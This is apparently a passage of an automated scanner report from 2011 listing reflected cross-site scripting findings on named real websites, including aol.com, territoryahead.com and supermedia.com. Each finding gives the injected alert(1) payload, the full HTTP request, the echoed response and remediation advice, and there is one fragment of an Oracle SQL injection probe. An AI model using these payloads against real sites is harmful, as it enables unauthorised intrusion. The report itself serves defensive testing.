<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=ac3d5"-alert(1)-"2bfe3cee0a";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="Badly formatted flow execution key ''||(utl_inaddr
...[SNIP]...

5.128. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d6bc"-alert(1)-"f4dec4eed60 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: 5d6bc"-alert(1)-"f4dec4eed60
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083848|check#true#1301082048; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:47:40 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 24596


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="5d6bc"-alert(1)-"f4dec4eed60";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

5.129. https://www.territoryahead.com/account/login/loginmain%20.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload d915e--><script>alert(1)</script>15454db3650 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount
Referer: http://www.google.com/search?hl=en&q=d915e--><script>alert(1)</script>15454db3650

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:34:53 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36933


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
t; JSESSIONID=eDwn-UFCx4o7; s_cc=true; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301505878&v=3&e=1301507678363
Referer: http://www.google.com/search?hl=en&q=d915e--><script>alert(1)</script>15454db3650
UNIQUE_ID: mDkX8qwSrSgAAET8808AAAA5
SCRIPT_URL: /account/login/loginmain .jsp
SCRIPT_URI: https://www.territoryahead.com/account/login/loginmain .jsp
HTTPS: on

Cookies:
mmlID = 68
...[SNIP]...

5.130. https://www.territoryahead.com/account/login/loginmain%20.jsp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload b001b--><script>alert(1)</script>8cb69a80b72 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16b001b--><script>alert(1)</script>8cb69a80b72
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:26:02 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36882


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
ers:
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16b001b--><script>alert(1)</script>8cb69a80b72
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: IS
...[SNIP]...

5.131. https://www.territoryahead.com/jump.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 3ba62--><script>alert(1)</script>19ec2497be6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e
Referer: http://www.google.com/search?hl=en&q=3ba62--><script>alert(1)</script>19ec2497be6

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:27:09 GMT
Server: Apache
ETag: "AAAAS7ucUQm"
Last-Modified: Fri, 25 Mar 2011 19:15:23 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38498


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
57cchr%28105%29%257c%257cchr%28108%29%257c%257cchr%28101%29%257c%257cchr%28109%29%257c%257cchr%28109%29%257c%257cchr%2897%29%29%252c25%29+from+dual%29
Referer: http://www.google.com/search?hl=en&q=3ba62--><script>alert(1)</script>19ec2497be6
UNIQUE_ID: lH5ufKwSrSgAAH2NuOoAAAAl
SCRIPT_URL: /jump.jsp
SCRIPT_URI: https://www.territoryahead.com/jump.jsp
HTTPS: on

Cookies:
mmlID = 68408168
CoreID6 = 8280633328661299090
...[SNIP]...

5.132. https://www.territoryahead.com/jump.jsp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 926e9--><script>alert(1)</script>5e35377ec36 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16926e9--><script>alert(1)</script>5e35377ec36
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:27:00 GMT
Server: Apache
ETag: "AAAAS7ucSNw"
Last-Modified: Fri, 25 Mar 2011 19:15:15 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38447


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
ers:
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16926e9--><script>alert(1)</script>5e35377ec36
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: IS
...[SNIP]...

5.133. http://portal.smartertools.com/ST.ashx [siteuidut cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://portal.smartertools.com
Path:   /ST.ashx

Issue detail

The value of the siteuidut cookie is copied into the HTML document as plain text between tags. The payload fe233<script>alert(1)</script>e5e34b07103 was submitted in the siteuidut cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ST.ashx?scriptonly=true HTTP/1.1
Host: portal.smartertools.com
Proxy-Connection: keep-alive
Referer: http://forums.smartertools.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942bfe233<script>alert(1)</script>e5e34b07103; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=61502381.1300551951.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); uidut=6488571; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; __utma=61502381.1558309378.1300551951.1300557309.1300912321.4

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:43:40 GMT
Content-Length: 33118

this.STVisitorValue = "1dad4e31be764ea7b431d43fbac2942bfe233<script>alert(1)</script>e5e34b07103";this.STCallbackInterval = 8000;this.STHandlerFile = "ST.ashx";this.STStopCallbackAfterMs = 900000;this.STLastCallbackImageHeight = 0;
this.STLastCallbackAction = 0;
this.STTimeoutID = 0;
this.STPo
...[SNIP]...

5.134. http://www.aol.com/ [dlact cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /

Issue detail

The value of the dlact cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e131d"-alert(1)-"4408da0b00a was submitted in the dlact cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; tst=%2C2%2Cs391%3A%2C2%2Cs392%3A%2C2%2Cs393%3A%2C2%2Cs394; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; stips5=1; dlact=dl3e131d"-alert(1)-"4408da0b00a; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; s_pers=%20s_getnr%3D1301171833374-Repeat%7C1364243833374%3B%20s_nrgvo%3DRepeat%7C1364243833377%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcommem%253D%252526pid%25253Dacm%25252520%2525253A%25252520main5%25252520AOL.com%252525205.0%25252520Main%252526pidt%25253D1%252526oid%25253Daol-jumpbar1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:40 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmc17.websys.aol.com
Content-Type: text/html;;charset=utf-8
Content-Length: 71380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
var dlImps = new Array();dlImps["dl1"]=true;
var dlact = "dl3e131d"-alert(1)-"4408da0b00a";
var dlduration = 10000;
var dloverrided = false;
var dlcurr = 1;
var dltotal = 14;
var paramslot = "dynamiclead";
var dloffset = 0;
var ftmslo
...[SNIP]...

5.135. https://www.territoryahead.com/account/login/loginmain%20.jsp [CoreID6 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of the CoreID6 cookie is copied into an HTML comment. The payload 97c44--><script>alert(1)</script>24a58cae691 was submitted in the CoreID6 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=9023209497c44--><script>alert(1)</script>24a58cae691; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:34:46 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36926


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=9023209497c44--><script>alert(1)</script>24a58cae691; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount; JSESSIONID=eDwn-UFCx4o7; s_cc=true; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301081933&v=3&e=
...[SNIP]...

5.136. https://www.territoryahead.com/account/login/loginmain%20.jsp [PS_ALL cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of the PS_ALL cookie is copied into an HTML comment. The payload 1a21a--><script>alert(1)</script>b0d0d16d38e was submitted in the PS_ALL cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount1a21a--><script>alert(1)</script>b0d0d16d38e

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:34:50 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36926


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
n-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount1a21a--><script>alert(1)</script>b0d0d16d38e; JSESSIONID=eDwn-UFCx4o7; s_cc=true; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301505878&v=3&e=1301507678363
UNIQUE_ID: mAN4LawSrSgAAH0dJF4AAABL
SCRIPT_
...[SNIP]...

5.137. https://www.territoryahead.com/account/login/loginmain%20.jsp [customer cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of the customer cookie is copied into an HTML comment. The payload 5093e--><script>alert(1)</script>bdfc4321075 was submitted in the customer cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=926439315093e--><script>alert(1)</script>bdfc4321075; PS_ALL=%23ps_catid%7Eaccount

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:34:48 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36926


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
te,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=926439315093e--><script>alert(1)</script>bdfc4321075; PS_ALL=%23ps_catid%7Eaccount; JSESSIONID=eDwn-UFCx4o7; s_cc=true; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301081933&v=3&e=1301083737353
UNIQUE_ID: l-MVN6
...[SNIP]...

5.138. https://www.territoryahead.com/account/login/loginmain%20.jsp [mmlID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of the mmlID cookie is copied into an HTML comment. The payload 36d2e--><script>alert(1)</script>1deb5b8a81e was submitted in the mmlID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=6840816836d2e--><script>alert(1)</script>1deb5b8a81e; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:34:45 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36926


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
